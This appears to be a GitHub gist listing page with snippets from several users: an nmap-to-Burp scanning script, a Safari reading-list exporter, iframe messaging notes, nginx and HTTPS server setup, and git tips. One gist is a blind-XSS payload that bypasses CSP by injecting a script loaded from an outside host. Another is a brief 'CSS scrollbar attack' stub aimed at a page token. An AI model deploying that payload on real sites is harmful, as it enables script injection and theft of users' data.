@jgamblin
jgamblin / nmapburp.sh
Created Sep 6, 2018
NMap a network and send all open web servers to Burp.
View nmapburp.sh
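#!/bin/bash
# Script to scan all sites found with a simple Nmap scan with Burp.
# Usage: nmapburp.sh <target>
# -p 443 limits the scan to port 443; --open lists only hosts where it is open.
sites=$(nmap "$1" -p 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}')
for site in $sites
do
    # Submit each host to the scan endpoint listening on 127.0.0.1:1337.
    curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1
    printf "Scanning %s with burp.\\n" "$site"
done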
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active Dec 22, 2020
BXSS - CSP Bypass with Inline and Eval
View gist:311cf3981fda8303d65c27316e69209f
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
View scrollbar.md

CSS Scrollbar attack

Imagine we have the following code:

<script>
var TOKEN="abcdef";
</script>
@arcadia168
arcadia168 / exportsafarireadinglist.sh
Last active Jan 19, 2020
Export Safari's Reading List to Pocket/Evernote (or any service with an "email content in" feature)
View exportsafarireadinglist.sh
#!/bin/bash
# Script to export Safari's reading list into a text file, then import this into Pocket or Evernote (or any service with an "email in content" feature).
# First take all of Safari's Reading List items and place them in a text file.
/usr/bin/plutil -convert xml1 -o - ~/Library/Safari/Bookmarks.plist | grep -E -o '<string>http[s]{0,1}://.*</string>' | grep -v icloud | sed -E 's/<\/{0,1}string>//g' > readinglistlinksfromsafari.txt
# Now loop over each of those URLs within that text file and add them to Pocket.
while IFS= read -r line
do
    echo "$line"
@pbojinov
pbojinov / README.md
Last active May 6, 2021
Two way iframe communication- Check out working example here: http://pbojinov.github.io/iframe-communication/
View README.md

Two way iframe communication

The main difference between the two pages is the method of sending messages. Receiving messages is the same in both.

Parent

Send messages to iframe using iframeEl.contentWindow.postMessage
Receive messages using window.addEventListener('message')

iframe

View simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@plentz
plentz / nginx.conf
Last active May 7, 2021
Best nginx configuration for improved security (and performance). Complete blog post here: http://tautt.com/best-nginx-configuration-for-security/
View nginx.conf
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@jjperezaguinaga
jjperezaguinaga / chrome.md
Created Dec 9, 2012
Understanding Google Chrome Extensions
View chrome.md

#Introduction

Developing Chrome Extensions is REALLY fun if you are a Front End engineer. If you, however, struggle with visualizing the architecture of an application, then developing a Chrome Extension is going to bite your butt multiple times due to the amount of excessive components the extension works with. Here are some pointers on how to start, what problems I encounter and how to avoid them.

Note: I'm not covering Chrome package apps, which although similar, work in a different way. I also won't cover the page options API or the brand new event pages. What I explain covers most basic Chrome applications and should be enough to get you started.

Table of Contents

  1. Understand the Chrome Architecture
  2. Understand the Tabs-Extension Relationship
  3. Picking the right interface for the job
View README.md

agnoster.zsh-theme

A ZSH theme optimized for people who use:

  • Solarized
  • Git
  • Unicode-compatible fonts and terminals (I use iTerm2 + Menlo)

For Mac users, I highly recommend iTerm 2 + Solarized Dark

@piscisaureus
piscisaureus / pr.md
Created Aug 13, 2012
Checkout github pull requests locally
View pr.md

Locate the section for your github remote in the .git/config file. It looks like this:

[remote "origin"]
	fetch = +refs/heads/*:refs/remotes/origin/*
	url = git@github.com:joyent/node.git

Now add the line fetch = +refs/pull/*/head:refs/remotes/origin/pr/* to this section. Obviously, change the github url to match your project's URL. It ends up looking like this: